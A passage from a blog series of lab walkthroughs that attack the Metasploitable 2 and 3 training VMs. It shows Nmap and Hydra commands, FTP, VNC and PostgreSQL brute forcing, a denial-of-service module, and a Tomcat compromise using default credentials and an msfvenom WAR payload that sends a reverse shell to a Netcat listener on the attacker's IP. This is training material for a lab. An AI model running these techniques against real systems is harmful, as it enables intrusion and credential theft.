src="https://drive.google.com/uc?id=10biIQzk16Eb7mouDzlGzHs6y-S-_J4eQ" border="0"></a><p>Start with Metasploit’s scanner module:<p><a href="https://drive.google.com/uc?id=12glBClkJ6M_zBPXOGFqdlXOYvFaRjJPY" target="_blank"><img width="692" height="759" title="Dumping the target's memory with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the target's memory with Metasploit" src="https://drive.google.com/uc?id=1T-C53b7kFENsh85mCOjN-gb7wsFY41wh" border="0"></a><p>The module works but it doesn’t return anything really interesting. However, it is a good example of how a target’s memory can be dumped and saved into the database.<p>Now, with the other module try to create a DoS:<p><a href="https://drive.google.com/uc?id=1jofjnoRnwKdx6s-2lgULGdYunF8kKxaA" target="_blank"><img width="573" height="134" title="Causing a DoS with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Causing a DoS with Metasploit" src="https://drive.google.com/uc?id=1s8KcCp6vCSLVU4jMZzkAxpxwnWsMTh51" border="0"></a><p>And it works, the target machine immediately crashes:<p><a href="https://drive.google.com/uc?id=1OvLLFjCDyBYl2TIhPDlBrCMdMfRrKxSn" target="_blank"><img width="584" height="483" title="The DoS exploit effect on the target" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The DoS exploit effect on the target" src="https://drive.google.com/uc?id=1meGbao1cP2wAiKzuiU-jj2N1aKnVEzOz" border="0"></a><p>There are plenty other scanners that can used against port 80 but in this case they are all useless because in that specific port there is nothing to exploit, only this:<p><a href="https://drive.google.com/uc?id=1nlbhUJibKpQjrW0JZPcSLQp34af1M73D" target="_blank"><img width="450" height="202" title="Metasploitable 3 port 80 banner" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 port 80 banner" src="https://drive.google.com/uc?id=1da9uwrjFQ1PvnelVFAfAvVA7J_-jMO1o" border="0"></a></p><p><p><a title="Metasploitable 3 Windows Walkthrough: Part IV" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part_5.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-13598983371123519892020-11-04T16:43:00.000-08:002020-11-21T04:17:11.306-08:00Metasploitable 3 Windows Walkthrough: Part II<p>Just for the sake of organization, like it was done for <a title="Metasploitable 2" href="https://tremblinguterus.blogspot.com/2020/11/metasploitable-2-walkthrough-part-i.html">Metasploitable 2</a>, let’s start exploring the services in ascending port order.<h2>Exploiting Port 21 – IIS FTP</h2><p>The Web Server (IIS) role in Windows Server provides a secure, easy-to-manage, modular and extensible platform for reliably hosting websites, services, and applications.<p>In Windows Server 2008, Internet Information Services (IIS) gained a new administration interface and configuration store, and the new FTP service is tightly integrated with this design. Microsoft rewrote the FTP service and this updated version service incorporates many new features that enable web authors to publish content better than before, and offers web administrators more security and deployment options.<p>But in spite of being integrated in the Web Server, the IIS FTP service works pretty much like any other FTP server, <h3>Brute forcing IIS using Hydra</h3><p>Users can access the Metasploitable 3 VM by logging into the FTP server with a valid set of credentials. Therefore, it is a good idea to try some of the most commonly used combinations and try to brute force the access to the FTP server. Kali Linux has a number of wordlists that can be used for this purpose. Let’s use Hydra to launch an attack:<p><strong><em>hydra -L [users file] -P [passwords file] [IP] [service]</em></strong><p><a href="https://drive.google.com/uc?id=1YY78mRzBQ_3QJ_k3eEsWCMGFIXAjM4HL" target="_blank"><img width="806" height="157" title="Brute forcing FTP with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing FTP with Hydra" src="https://drive.google.com/uc?id=1Nu7C5nN1rTlesLjdt134mbcGVZbiJA2c" border="0"></a><p>This will take a very long time because the tool will try every password for each user. And it might not return any good results unless you use carefully selected wordlists.<p>This is an example of successful results obtained with custom created wordlists:<p><a href="https://drive.google.com/uc?id=1MafDqTSyHlQ8SbA6GjKMu3XKDgh9xIsz" target="_blank"><img width="806" height="168" title="Brute forced FTP using Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forced FTP using Hydra" src="https://drive.google.com/uc?id=1QQW7Xvz4izllbPN8YlE2UdyhnF25G1l7" border="0"></a><p>Once you have found a valid credential set, you can use it to login to the remote FTP server:<p><a href="https://drive.google.com/uc?id=1AOnPGDgA9Zvpf7xjnThnBMy6-4MBbeFN" target="_blank"><img width="322" height="198" title="FTP login with brute forced credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="FTP login with brute forced credentials" src="https://drive.google.com/uc?id=1ApsFhTSKQ1XRdgblct724T6-Cfk7CXnS" border="0"></a><p>This can then be used to download/upload files, etc.<h3><a name="_Toc52385117"></a></h3><a name="more"></a><h3>Brute forcing IIS using Metasploit</h3><p>Metasploit has an auxiliary module that can also be used to brute FTP force passwords just like Hydra did.<p> <a href="https://drive.google.com/uc?id=1WxCY6NNHQdkAYs99ow0pu0rg7AV7QfSK" target="_blank"><img width="806" height="258" title="Brute forcing FTP with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing FTP with Metasploit" src="https://drive.google.com/uc?id=1VHPVyb40JgXEJ3mW88HXD6im2voMUrtw" border="0"></a><p>Using the custom wordlists previously created will produce the same results. But using Metasploit has a major advantage over Hydra because the credentials found are automatically added to the database.<p><a href="https://drive.google.com/uc?id=1sUtTBMxAvusF6FgqIvruKPjrrqU8NEDI" target="_blank"><img width="688" height="143" title="Brute forced credentials added to MSF's database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forced credentials added to MSF's database" src="https://drive.google.com/uc?id=1kXp3yxrPzYaNizeHIiWmECqjyx154OoO" border="0"></a><h3>Brute forcing IIS using Nmap</h3><p>Using wordlists provided with Kali, and using the proper Nmap script (<b><em>ftp-brute</em></b>) you will get positive results.<p><a href="https://drive.google.com/uc?id=1NJQW6PVPT9-egNbHGpHiaxt9kr7vWFzp" target="_blank"><img width="806" height="215" title="Brute forcing FTP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing FTP with Nmap" src="https://drive.google.com/uc?id=18wfAbNHdSu5Tpii57xGHLWdwhbL4Fj42" border="0"></a><h3>IIS Directory Traversal</h3><p>The FTP server will open a connection to the site and files of the port 80 IIS website.<p>Even if you want, you cannot escape that directory.<p><a href="https://drive.google.com/uc?id=19LqdupBbYZaJPpe5de87pZkaKWLwCOGN" target="_blank"><img width="557" height="643" title="FTP directory lock" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="FTP directory lock" src="https://drive.google.com/uc?id=11Oage1sCipzHgN9gV6ds6Ouz2jeK6SZI" border="0"></a><p>You can try a traversal attack to escape the directory location. This can be done manually or via a tool such as <b><em>dotdotpwn</em></b> as shown below.<p>It will take a significant amount of time to test all the generated directories, and it will probably fail. But it is worth the try to understand how this kind of attack works.<p><a href="https://drive.google.com/uc?id=1zbMWjW5MHXOcrMG9SWbO6g5wyMpc4jzc" target="_blank"><img width="551" height="604" title="Directory traversal attempt" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Directory traversal attempt" src="https://drive.google.com/uc?id=1n0dcwEww0KBMIvXM5pu7msXr8fgNb0He" border="0"></a><h3><a href="https://drive.google.com/uc?id=1R0hq8Cvg5B3iMz4De9EUpdtqVjr5VLyT" target="_blank"><img width="547" height="206" title="Directory traversal failed" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Directory traversal failed" src="https://drive.google.com/uc?id=1hVPr-wCtThyh0yHxQNwXVkXnztsmz2eH" border="0"></a></h3><h3>IIS FTP Denial of Service</h3><p>If you look closely at the OpenVAS scan results, you will see this:<p><a href="https://drive.google.com/uc?id=1OYJdUjB2hogUfln9cIhY5wWioe4YOy8F" target="_blank"><img width="785" height="42" title="OpenVAS reporting DoS vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting DoS vulnerability" src="https://drive.google.com/uc?id=1DHoDVJYM5s-5O-JHzwh8_YBDqsI12A-j" border="0"></a><p>Searching for the CVE online will give you give access to an exploit:<p><a href="https://drive.google.com/uc?id=1QO_nnFfM8F5-00mRY1p5J6iZten5phla" target="_blank"><img width="806" height="150" title="DoS exploit in ExploitDB" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="DoS exploit in ExploitDB" src="https://drive.google.com/uc?id=1btWt1SW8h--wKl-1Xx9CMcVjzupyRN7O" border="0"></a><p>And that same exploit is available in your Kali machine:<p><a href="https://drive.google.com/uc?id=1RibfoZJEIrEBp_ao3HpEbbBDZcYkWkyT" target="_blank"><img width="806" height="238" title="DoS exploit failed" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="DoS exploit failed" src="https://drive.google.com/uc?id=1fqXMgq-_Dy7e2WMNQ8VRPS2qCRlgsGBk" border="0"></a><p>The reason for failure is certainly related to the use of old Python code. It would be a waste of time trying to update it; the exploit will only cause the remote machine to crash. Not very useful…Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-17959692317621846622020-11-04T13:04:00.000-08:002020-11-21T04:15:47.260-08:00Metasploitable 3 Windows Walkthrough: Part I<h2>Overview</h2><p>Metasploitable3 is a Windows Server 2008 VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit. Not every type of vulnerability on Metasploitable3 can be exploited with a single module from Metasploit, but some can. Also, by default, the image is configured to make use of some mitigations from Windows, such as different permission settings and a firewall.<h2>Network Setup</h2><p>To conduct these exercises, you need to have 2 machines. One computer is used for attacking, the second computer is used as the victim. Using virtual machines is always the best solution for training purposes so in the following examples a Kali Linux VM and a Metasploitable 3 VM connected to a Virtual Box internal network with a router between the two VMs.<p>To change the settings of the Metasploitable 3 VM just follow the normal procedure to configure network interfaces in Windows. Besides, the VM has the normal Windows firewall installed and configured with a set of rules. For the following examples, the firewall will be turned off but feel free to turn it back on or tweak the rules.<p><a href="https://drive.google.com/uc?id=1w0lIKNpQ6HzUujQT2dC5DRRz4n_2LUc7" target="_blank"><img width="806" height="499" title="Metasploitable 3 firewall settings" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 firewall settings" src="https://drive.google.com/uc?id=1kR2YDsVV_0QoTtyVnHungVyu7fp4E-BA" border="0"></a><p>Having the firewall turned off from the start will allow you to get complete scan results.<p>But if you decide to attack this VM with the firewall on, turning it off could be one of the first tasks. Or you can get a shell and then create an SSH tunnel that will allow you to bypass the firewall.<h2>Scanning and Enumeration</h2><p>The first step is to gather as much information as you can about the remote system. Use Nmap, Legion and OpenVAS to identify the open ports, running services and vulnerabilities on the target.<h3>Nmap scan</h3><p>Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. You can run Nmap directly from the CLI but it might be a good idea to run Nmap from within Metasploit so that the results are added to the MSF database for further analysis and later use. <p>There are many scanning possibilities but the following choices of options will balance speed with accuracy. As you add more options, you might sacrifice speed in order to get better results:<ul><li><b>nmap -sS [IP Address]</b></li><li><b>nmap -sV [IP Address]</b></li><li><b>nmap -T4 -sV --version-all --osscan-guess -A [IP Address]</b></li></ul><p><b></b><p>Typical results:<p><a href="https://drive.google.com/uc?id=1De45FvHd6GDB0N6MvOU5uvetXeidq32M" target="_blank"><img width="811" height="540" title="Metasploitable 3 Nmap initial scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Nmap initial scan results" src="https://drive.google.com/uc?id=1vFgl_i6--7QEt_wU0AuRJdJg7808-QD1" border="0"></a><p>However, the previous options won’t show you all the open ports because the <b><em>-sV</em></b> scan mode for service and version detection will use the <b><em>nmap-services</em></b> database of about 2,200 well-known services.<p>Therefore, it might be a good idea to run some scans covering wider ranges of ports:<ul><li><b>nmap -sV --osscan-guess -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]</b></li><li><b>nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-65535 [IP Address]</b></li></ul><p><b></b><p>and even UDP ports:<ul><li>nmap -sU -sV --version-all -p 1-10000 [IP Address]</li></ul><p>And these are the results:<p><a href="https://drive.google.com/uc?id=1sVljGlyP2R1uEKLZlGap3cHZjtne3Uk9" target="_blank"><img width="815" height="785" title="Metasploitable 3 Nmap final scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Nmap final scan results" src="https://drive.google.com/uc?id=1MSLssv10yhp4tkXNYko2nGeJPLRVLLTW" border="0"></a><p>As you can see, there are many open ports and running services on the target VM.<p>However, the host is added to the database with wrong information:<p><a href="https://drive.google.com/uc?id=1UE7o1d38R64us85JIWUCQCihEbrWzqqK" target="_blank"><img width="618" height="141" title="OS identification in the MSF database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OS identification in the MSF database" src="https://drive.google.com/uc?id=1fhOxMbRfDyXVPZkpO-t5SBTch0ccXY_A" border="0"></a><p>But Nmap identifies it correctly:<p><a href="https://drive.google.com/uc?id=1hiR2SC8IhvF4Hepy23YS7Dc3Qbpkgu_O" target="_blank"><img width="774" height="58" title="Nmap OS identification results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap OS identification results" src="https://drive.google.com/uc?id=1yVOmqH-FNTRkczzY3YAgr9IEbXpgmjed" border="0"></a><p>If you want to have things nice and clean from the start, just use Metasploit to fix it:<p><a href="https://drive.google.com/uc?id=1GzJtOtClCdSoFJlCy0yGcIAwxmr-3IBR" target="_blank"><img width="777" height="402" title="Using auxiliary module to identify the OS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using auxiliary module to identify the OS" src="https://drive.google.com/uc?id=11a8Ca-dr2Ptq4GfJ_nnL92te0Nf0VOsG" border="0"></a><p>Now you have the correct info about your target added to the database.<h3>Legion scan</h3><p>Another easy way to get initial information on the target is to use Legion. This tool will run a number of Nmap scans and it will also load a number of other tools and use them to get information about the target machine.<p>Some of the tools will immediately try to test the found services and even brute force the logins.<p><a href="https://drive.google.com/uc?id=1iot2VPv8biadDAmFZ9D6iY1etDyE3qtW" target="_blank"><img width="779" height="566" title="Metasploitable 3 Legion scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Legion scan results" src="https://drive.google.com/uc?id=1h9p-BCEH-HJCKJYUUhOXpwFOTeGjVi1u" border="0"></a><p>You can save the result of this scan for later usage or for a quick reference. But for proper vulnerability scanning, you will need a better tool.<h3>OpenVAS scan</h3><p>For a comprehensive scan, try the Open Vulnerability Assessment Scanner. This this tool has a full range of capabilities including unauthenticated testing, authenticated testing, various high level and low-level Internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test.<p>It can be installed on Kali Linux and it can be updated daily with the latest vulnerability tests.<p><a href="https://drive.google.com/uc?id=1tzuhM2ozPcd9YmM7fMl3NDDIg6sVM4Tc" target="_blank"><img width="781" height="527" title="Metasploitable 3 OpenVAS scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 OpenVAS scan results" src="https://drive.google.com/uc?id=1ripZeOG6yMzQJuWflzn25Fzokvx2cSl8" border="0"></a><p>You are now ready to start exploiting the services available in Metasploitable 3 Windows 2008 Server!<p><br><p><strong>Previous post</strong>: <a title="Metasploitable 2 Walkthrough: Part X" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-2-walkthrough-part-x.html">Metasploitable 2 Walkthrough: Part X</a></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-52416306354981701132020-11-04T13:00:00.000-08:002020-11-21T04:09:46.384-08:00Metasploitable 2 Walkthrough: Part X<h2>Exploiting Port 8180 – Apache Tomcat</h2><p>Apache Tomcat provides software to run Java applets in the browser. Coyote is a stand-alone web server that provides servlets to Tomcat applets. That is, it functions like the Apache web server, but for Java Server Pages (JSP). All this means is, web pages accessed through port 8180 will be assembled by a Java web application. <p>The Nmap scan didn't return the version, so that's probably the first thing we'll want to figure out.<p>There are many Metasploit modules available for Tomcat so you should focus on your goals:<ul><li>Survey the website</li><ul><li>Exploit possible vulnerable pages</li></ul><li>Obtain credentials</li><li>Deploy payload</li></ul><h3>Surveying Apache Tomcat using Metasploit</h3><p>Load the proper Metasploit auxiliary module and run it</p><p><a href="https://drive.google.com/uc?id=15AdUd6p3mA-Amq3mSGaEHHwK1LUafCmQ" target="_blank"><img width="750" height="350" title="Surveying the Apache Tomcat service" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Surveying the Apache Tomcat service" src="https://drive.google.com/uc?id=1QbHj9v251Z4MbzVZ0F4ZdZTaXZq5hHXf" border="0"></a></p><p>These turn up some interesting pages that can potentially be bypassed:<p><a href="https://drive.google.com/uc?id=1v29nk4qCN_k8TokAw8ILXVLks-yn4lxi" target="_blank"><img width="482" height="382" title="Tomcat admin login page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Tomcat admin login page" src="https://drive.google.com/uc?id=1Mg1Q6tcTr_HDkjGGAsDGzQFCAsHPw0in" border="0"></a><p><a href="https://drive.google.com/uc?id=1SLQuWWmz3trFv2nF8D4KTJBC2APmcNJl" target="_blank"><img width="624" height="286" title="Tomcat WebDAV" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Tomcat WebDAV" src="https://drive.google.com/uc?id=1WSYLKuG_go0doY635tGzT3vkAgvGbv1i" border="0"></a><p>This initial recon will set the criteria for the choice of the next Metasploit modules. First, you have a login page - this provides a way to brute-force login credentials. Second, you have a WebDAV interface, and a potential avenue for uploading a PHP shell.<h3>Getting Apache Tomcat credentials using Metasploit</h3><p>Using the proper Metasploit module will produce immediate results:<p><a href="https://drive.google.com/uc?id=1hjzGURHUODDZPYsZLUE4Wb-iC_bnkzab" target="_blank"><img width="824" height="114" title="Getting Tomcat credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting Tomcat credentials" src="https://drive.google.com/uc?id=13vlDrFU2QQO1lFk9jUrkvKrTBtz2CM0U" border="0"></a><p>That was easy, this module apparently found a set of valid credentials (tomcat/tomcat).<p>Let’s try to confirm these credentials:<p><a href="https://drive.google.com/uc?id=1WQkTUyRMYlgyoE0ejNirSY9SQDlkrPwQ" target="_blank"><img width="823" height="314" title="image" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="image" src="https://drive.google.com/uc?id=1wU8jgkty1blTPnldelXgvZSEM90nIfUx" border="0"></a><p>Pay attention to the default settings. Change them if you want, or try them as they are:<p><a href="https://drive.google.com/uc?id=1kkPGgf7jHciaQPEHLjkC9_jF-GM_utp9" target="_blank"><img width="606" height="195" title="Testing the Tomcat credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Testing the Tomcat credentials" src="https://drive.google.com/uc?id=1pxvjh7JBm-xn97EACV6UieglSjtpHBGm" border="0"></a><h3>Deploying a payload to Apache Tomcat using Metasploit</h3><p>Just as obtaining a remote shell on the web server with Apache required uploading and executing a PHP script, obtaining a remote shell on this web server will require uploading and executing a file - but for Tomcat, the executable must be a JSP (Java Server Pages) application.</p><p>This is solved by the<strong><em> tomcat_mgr_deploy</em> </strong>module</p><p><a href="https://drive.google.com/uc?id=1A-ah5tSq5nZNy0qgGkaV35Dw8AfHKy76" target="_blank"><img width="832" height="628" title="Exploiting Tomcat with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Tomcat with MSF" src="https://drive.google.com/uc?id=1w7wgqyBRbCnavdMXR0sS96viFjxLqguz" border="0"></a><p>Pay attention to the selection of targets and payloads. With the default <strong><em>java/meterpreter/reverse_tcp</em></strong> payload you will probably won’t succeed in getting a session. Try different combinations until you do.<p>And there is also the<strong><em> tomcat_mgr_upload</em></strong> module which is very similar but it also requires a change of the default payload.<p>Try it also.<p><a href="https://drive.google.com/uc?id=1wazC8sPT8u9eMNmxDHiijJdrPTsMfbvE" target="_blank"><img width="832" height="397" title="Exploiting Tomcat with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Tomcat with MSF" src="https://drive.google.com/uc?id=1aIjO9CwjPBVLtROEvqS50Ef7-gsiQO7R" border="0"></a><p>In both cases, you get a low privilege shell<h3>Deploying a payload to Apache Tomcat manually</h3><p>If, for some reason, the Metasploit automated payload deployment fails you can still exploit this server manually.<p>The management web interface gives us a place to upload <b><em>WAR</em></b> files, and a way to execute them manually. <p>The <b><em>.war</em></b> are Web ARchive files that contain all the files needed for a Java based web application. These are the files used by the Metasploit modules.<p>Using <b>msfvenom</b>, you can create shellcode and then specify what type of file to send it to. It just so happens, that one of the filetypes that msfvenom supports is .war.<p>Use msfvenom to craft a WAR file with the payload, then manually upload and execute it.<ul><li>Kali IP: 172.16.1.6</li><li>Kali port: 5555</li></ul><p><a href="https://drive.google.com/uc?id=1objehRtLcLuI4ugFcAXzgdEvMNbRrLRl" target="_blank"><img width="827" height="142" title="Creating the Web Archive payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating the Web Archive payload" src="https://drive.google.com/uc?id=1BCGYHmw17Rn2JJyBKkTUBP8IzK43sq3A" border="0"></a></p><p>Access the manager at <b><em>[Target IP]:8180/manager/html</em>. </b>You will be asked for credentials but that is not a problem; just enter tomcat/tomcat.<p>Select the previous file and deploy it.<p><a href="https://drive.google.com/uc?id=1rYk8opyDHCVc5oXObkDrp3Qv_zS2k5jP" target="_blank"><img width="827" height="592" title="Uploading the payload to Tomcat" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload to Tomcat" src="https://drive.google.com/uc?id=1Lku6HqSWKKqbBI3exr1A3NbD5zJKzeJR" border="0"></a><p>Note that this does NOT execute the payload yet!!!<p>To execute the payload and run the actual .war file, you will need to visit the page <b><em>http://[Target IP]:8180/runme/</em></b>. However, this will try and connect to our command-and-control server on port 5555, so you need to be listening for the incoming connection.<p>Use Netcat to receive the incoming shell once the WAR file is executed.<p><a href="https://drive.google.com/uc?id=1St5IhznFmeCArUQVCnUzrn9qD_YJWXKJ" target="_blank"><img width="389" height="135" title="Starting the Netcat listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting the Netcat listener" src="https://drive.google.com/uc?id=1MRz79Z7skoYciunnz7EdEhvc5wT_NKXG" border="0"></a><p>Now, Netcat will listen for the incoming connection, so you're ready to execute your payload.<p>Run the applet/exploit on your browser:<p><a href="https://drive.google.com/uc?id=1FAAabLn66UE_HsUYgNIy0NpA5V1J2LHP" target="_blank"><img width="527" height="127" title="Running the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the payload" src="https://drive.google.com/uc?id=16okmAO3bLf_lciONBcdDCm8uTj_Dgetg" border="0"></a><p>And you will have a shell:<p><a href="https://drive.google.com/uc?id=1ZvsapjUoun7OaU3fxBGBXm5-jD8FCTCx" target="_blank"><img width="521" height="143" title="Netcat shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Netcat shell" src="https://drive.google.com/uc?id=1JK3x6gdigvSBjxr-LpfK7UTcvLlQ31Co" border="0"></a><p><b>NOTE</b>: You can also setup a listener using Metasploit’s multi handler module.<p><a href="https://drive.google.com/uc?id=1B62m5lLONwP90Hgy1myeNjFRSMdgBV4Z" target="_blank"><img width="835" height="245" title="Metasploit command shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploit command shell" src="https://drive.google.com/uc?id=1qQtnt6JViK6fyr9JOQCQtNH-47FmRWCe" border="0"></a><p>The advantage of using Metasploit is the possibility of changing the session from command shell to meterpreter.<p><a href="https://drive.google.com/uc?id=1ckIzpZkA1EV8hzPVvGFG8QHtoYK5K27H" target="_blank"><img width="836" height="277" title="Upgrading the command shell to meterpreter shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Upgrading the command shell to meterpreter shell" src="https://drive.google.com/uc?id=1WPjuOz2pHqL20ozQBxjXJ0M3qIirb1_V" border="0"></a><h4>Cleaning up</h4><p>Remove the <em><strong>runme.war</strong></em> file by going back to <strong><em>[Target IP]:8180/manager/html</em> </strong>and clicking "Undeploy".<h2>Exploiting 8787 – Distributed Ruby</h2><p>Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes.<p>Easy exploit, just load the proper Metasploit module and use it<p><a href="https://drive.google.com/uc?id=1dw7ETQk4wVmnTm_B8_Ne13A54GqMZqai" target="_blank"><img width="808" height="292" title="Exploiting Distributed Ruby with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Distributed Ruby with Metasploit" src="https://drive.google.com/uc?id=11bvpaVqdyYeOMSbb1w_xUlms2KMchM2d" border="0"></a></p><p>This concludes the Metasploitable 2 exploitation. In some of the ports/services you can explore other alternatives but this series of posts illustrates pretty much all there is to it.</p><p>The next series of post will deal with Metasploitable 3 Windows and that will be somewhat different, specially because the Windows OS and the services installed in that vulnerable VM offer a lot of possibilities…</p><p><br></p><p><p><strong></strong></p><strong>Next post</strong>: <a title="Metasploitable 3 Windows Walkthrough: Part I" href="https://tremblinguterus.blogspot.com/2020/11/metasploitable-3-windows-walkthrough_34.html">Metasploitable 3 Windows Walkthrough: Part I</a>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-84363734489166084412020-11-04T11:49:00.000-08:002020-11-21T04:08:03.889-08:00Metasploitable 2 Walkthrough: Part IX<h2>Exploiting Port 5900 - VNC</h2><p>Virtual Network Computing or VNC service can be exploited using a module in Metasploit to find the login credentials.<p><a href="https://drive.google.com/uc?id=1loKmQXPtu53JLftjbXmh7_2OZZRGZhuW" target="_blank"><img width="810" height="202" title="Brute forcing VNC with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing VNC with Metasploit" src="https://drive.google.com/uc?id=1l5PjU_TrcO-NZelfyk7xK1pR9hiJD2Ow" border="0"></a><p>Now, connect to VNC Viewer<p><a href="https://drive.google.com/uc?id=1Z8yI2FCcdIXUezWSpytvkLVC6xQ6_Avs" target="_blank"><img width="723" height="292" title="Connecting to VNC Viewer" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to VNC Viewer" src="https://drive.google.com/uc?id=1UxvgNSqtB9N_iyIs59Pz9yepIGHmDNO8" border="0"></a><p>The credentials work and we have a remote desktop session that pops up in Kali.<p><a href="https://drive.google.com/uc?id=1PC-iXWdoWtjua6ReDRl2y7i5aO4iXKc0" target="_blank"><img width="727" height="474" title="VNC Viewer shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="VNC Viewer shell" src="https://drive.google.com/uc?id=1uIsE1dG74ty1VYH8jB9D47x01hOjpIwQ" border="0"></a><p>And you have another root shell.<h2><a name="_Toc55385857"></a></h2><a name="more"></a><h2>Exploiting Port 6667 – Unreal IRDC</h2><p>The Unreal IRCD can be exploited using a Metasploit module created to connect to a malicious backdoor present in the Unreal server.<p><a href="https://drive.google.com/uc?id=1JP138TiWUohZ0gNlDNOt-Zgxt-e6G1TO" target="_blank"><img width="835" height="480" title="Exploiting Unreal IRCd with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Unreal IRCd with Metasploit" src="https://drive.google.com/uc?id=1d5HbMpKNjVYt0el-Mg4go0TK9ZgOhJDa" border="0"></a><p>And you have another root shell.</p><p><p><a title="Metasploitable 2 Walkthrough: Part X" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-2-walkthrough-part-x.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-45964613783419307742020-11-04T10:50:00.000-08:002020-11-21T04:17:45.696-08:00Metasploitable 2 Walkthrough: Part VIII<h2>Exploiting Port 3632 – DistCC</h2><p>DistCCd is the server for the DistCC distributed compiler. It accepts and runs compilation jobs for network clients. Metasploit has a module to exploit this service.<p><a href="https://drive.google.com/uc?id=1nQvvtGwj_UvE3rWIVeCq-DHh05rETRMl" target="_blank"><img width="837" height="414" title="Exploiting DistCC with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting DistCC with MSF" src="https://drive.google.com/uc?id=1sn3iTgiUS0uHSt6f6fNLPO0zPpo_gpKu" border="0"></a><p>This is another low privileged account. <h2>Exploiting Port 5432 – PostgreSQL</h2><p>One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name.<p>Fortunately, the way that PostgreSQL works is by shipping with a default database called <b><em>template1</em></b> that is the template database from which all other databases are created. This means that you can (probably) always find a database named template1 in any PostgreSQL database.<p>There is also a <b><em>template0</em></b> database, which contains no local settings and is even more basic than template1, so there should always be at least these two known databases in any PostgreSQL service.<h3><a name="_Toc55385851"></a></h3><a name="more"></a><h3>Brute forcing PostgreSQL using Metasploit</h3><p>There are several Metasploit modules to be used against PostgreSQL, but you should start with the one that might give you access to the database.<p>The procedure is exactly the same as for the previous services:<ul><li>Load module</li><li>Check default options</li><li>Select user and password files, or other creds</li><li>Run module</li></ul><p><a href="https://drive.google.com/uc?id=1FXxHGD5MOjI2HNaqX5lMGHSyu0igqaao" target="_blank"><img width="842" height="299" title="The Metasploit PostgreSQL login module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The Metasploit PostgreSQL login module" src="https://drive.google.com/uc?id=1j5wzLkHfQWhzLYAbQRkjvqfA0DdnqwiO" border="0"></a><p>Try to run the module with the default settings, adjusting only the IP of the target machine<p><a 